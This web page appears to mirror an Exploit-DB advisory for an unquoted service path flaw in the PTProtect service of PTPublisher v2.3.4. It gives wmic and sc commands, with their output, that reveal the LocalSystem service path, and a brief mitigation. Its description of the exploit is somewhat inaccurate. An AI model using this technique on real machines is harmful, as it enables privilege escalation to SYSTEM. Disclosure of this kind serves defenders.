header-logo
Suggest Exploit
vendor:
PTPublisher
by:
bios
7.8
CVSS
HIGH
Unquoted Service Path
426
CWE
Product Name: PTPublisher
Affected Version From: 2.3.2004
Affected Version To: 2.3.2004
Patch Exists: NO
Related CWE:
CPE: a:primera_technology:ptpublisher:2.3.4
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 10 Pro x64
2022

PTPublisher v2.3.4 – Unquoted Service Path

The vulnerability exists due to an unquoted service path in the PTProtect service. An attacker can exploit this vulnerability by creating a malicious executable file with the same name as the service executable file and placing it in the same directory. This will allow the malicious executable to be executed with SYSTEM privileges.

Mitigation:

Ensure that all service paths are properly quoted. Additionally, ensure that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.primera.com/
# Tested Version: 2.3.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
PTProtect
        PTProtect
C:\Program Files (x86)\Primera
Technology\PTPublisher\UsbFlashDongleService.exe
                      Auto

C:\>sc qc PTProtect
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PTProtect
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PTProtect
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

Host Name:                 DESKTOP-OUHAB1I
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044

Navigation

Suggest Exploit

Services By CQR